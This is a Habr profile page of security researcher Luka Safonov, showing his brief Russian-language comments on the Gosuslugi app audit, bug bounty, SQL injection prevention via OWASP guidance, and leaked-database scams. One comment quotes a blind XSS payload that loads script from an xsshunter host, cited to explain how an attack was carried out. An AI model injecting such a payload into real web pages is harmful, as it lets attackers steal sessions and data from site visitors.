Pull to refresh
264
0
Лука Сафонов @LukaSafonov

информационная опасность

Send message

Описанные кем? Про внедрение js и компрометацию third-party сервисов тоже прекрасно понимаю, например почти весь js тянется с gu-st.ru и т.д., но статья не претендует объять необъятное и никто мне не платил (хотя выше в каментах свечку держали) ни за написание, ни за полноценный аудит приложения и смежных сервисов.

На самом деле интереснее даже не само приложение "госуслуг", а новое - "госключ", но их анализ выходит за рамки этой статьи.

Вероятность уязвимостей конечно есть, но она компенсируется СЗИ/средствами мониторинга. В качестве рекомендаций я указал на возможность использования Bug Bounty программы для выявления уязвимостей, это даст дополнительную возможность выявлять баги.

Про утечку данных через сотрудника - я скорее поверю в локальную утечку через какой-нибудь МФЦ, нежели через госпортал. О внутренней утечке существуют только ничем и никак не подтвержденные слухи.

Стоимость аккаунта будет слишком дорогой, проще купить готовые/с фишинга.

Я имел ввиду массовые продажи, единичные аккаунты продаются даже в мессенджере, вы правы.

Сходу получаю ошибку: Превышено количество попыток подтверждения номера телефона. Попробуйте еще раз позже.
Скоро на Bug Bounty Ru, пока можете написать на info@bugbounty.ru.
На уровне базы данных могут не поддерживаются привязанные переменные, поэтому необходимо использовать другие варианты.

Вот примеры с PHP: www.php.net/manual/ru/security.database.sql-injection.php
способов предотвращения SQL-инъекций два:
• не использовать динамические запросы к базе;
• не использовать пользовательские данные.

Учите матчасть:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense

cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

NOP служат для «обхода» антивирусных средств, но это уже устаревшая техника.
Зачем тогда разворачивать собственный сервис для этой задачи, спросите вы.

0. Чтобы не нарушать NDA и не кидать данные по пентесту направо налево.
Остановил чтение здесь:

image
При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>
Ссылка в посте есть, информация многим может быть полезна, чего-то еще высасывать из пальца нет смысла. Можно было бы обойтись двумя строками текста, но хабр не твиттер.
Для версий Mac Book Pro без тачбара с двумя портами слева — зарядку необходимо использовать в верхнем порту.
а мужики-то не знают.
Такую «базу» можно и нагенерить, она содержит записи типа ХХ ХХ ХХХХХХ. В подарок купившему дают базу ALL CREDIT CARD PIN CODES IN THE WORLD LEAKED.

Ага, дело не монге, но пароли в «вашей» бд вы храните (хранили в 2019) plaintext’ом. Теперь поинт вызвал доверие?

Information

Rating
Does not participate
Location
Москва, Москва и Московская обл., Россия
Works in
Date of birth
Registered
Activity